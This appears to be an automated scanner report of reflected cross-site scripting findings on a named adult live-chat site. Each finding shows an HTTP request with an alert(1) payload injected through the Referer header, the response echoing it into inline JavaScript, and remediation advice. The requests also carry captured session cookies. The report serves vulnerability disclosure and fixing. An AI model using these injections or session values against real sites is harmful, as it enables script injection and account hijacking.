GET /live-sex-chats/pornstars/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=58ae9'-alert(1)-'abc512c790d
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:47 GMT Connection: close Content-Length: 265847 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/&rf=http://www.google.com/search?hl=en^q=58ae9'-alert(1)-'abc512c790d&qs=cat=1^roomid=249&qs=cat=1^roomid=249&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43a6f'-alert(1)-'e56dafa5755 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/role-play/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=43a6f'-alert(1)-'e56dafa5755
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:56 GMT Connection: close Content-Length: 53309 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/&rf=http://www.google.com/search?hl=en^q=43a6f'-alert(1)-'e56dafa5755&qs=cat=1^roomid=-999&qs=cat=1^roomid=-999&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cde'-alert(1)-'7896e5dc643 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-galleries/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=98cde'-alert(1)-'7896e5dc643
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:26 GMT Connection: close Content-Length: 29317 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/&rf=http://www.google.com/search?hl=en^q=98cde'-alert(1)-'7896e5dc643&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec165'-alert(1)-'39542b02b36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-photos/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=ec165'-alert(1)-'39542b02b36
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:34 GMT Connection: close Content-Length: 25154 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/&rf=http://www.google.com/search?hl=en^q=ec165'-alert(1)-'39542b02b36&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd985'-alert(1)-'f1142f5eb83 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-sessions/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=bd985'-alert(1)-'f1142f5eb83
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:47 GMT Connection: close Content-Length: 25492 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/&rf=http://www.google.com/search?hl=en^q=bd985'-alert(1)-'f1142f5eb83&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2392'-alert(1)-'0c423d5641 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-video-features/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=b2392'-alert(1)-'0c423d5641
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:47 GMT Connection: close Content-Length: 31786 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... vascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/&rf=http://www.google.com/search?hl=en^q=b2392'-alert(1)-'0c423d5641&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0352'-alert(1)-'ab159ea3fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=f0352'-alert(1)-'ab159ea3fa
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:14 GMT Connection: close Content-Length: 91916 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/&rf=http://www.google.com/search?hl=en^q=f0352'-alert(1)-'ab159ea3fa&qs=cat=1^roomid=557&qs=cat=1^roomid=557&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2760'-alert(1)-'c5e2447e511 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=e2760'-alert(1)-'c5e2447e511
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:39 GMT Connection: close Content-Length: 223783 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/&rf=http://www.google.com/search?hl=en^q=e2760'-alert(1)-'c5e2447e511&qs=cat=1^roomid=51&qs=cat=1^roomid=51&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
